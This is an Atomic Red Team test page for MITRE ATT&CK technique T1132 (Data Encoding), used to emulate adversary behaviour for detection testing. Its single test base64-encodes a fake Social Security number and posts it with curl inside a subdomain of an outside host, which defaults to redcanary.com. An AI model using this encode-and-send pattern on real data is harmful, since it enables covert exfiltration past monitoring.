CircleCI Atomic Red Team doc generator
33 lines
1.2 KiB
Markdown
33 lines
1.2 KiB
Markdown
# T1132 - Data Encoding
|
|
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132)
|
|
<blockquote>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Base64 Encoded data.](#atomic-test-1---base64-encoded-data)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Base64 Encoded data.
|
|
Utilizing a common technique for posting base64 encoded data.
|
|
|
|
**Supported Platforms:** macOS, Linux
|
|
|
|
|
|
#### Inputs
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| destination_url | Destination URL to post encoded data. | string | redcanary.com|
|
|
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
|
|
|
|
#### Run it with `sh`!
|
|
```
|
|
echo -n 111-11-1111 | base64
|
|
curl -XPOST #{base64_data}.#{destination_url}
|
|
```
|
|
|
|
|
|
|
|
<br/>
|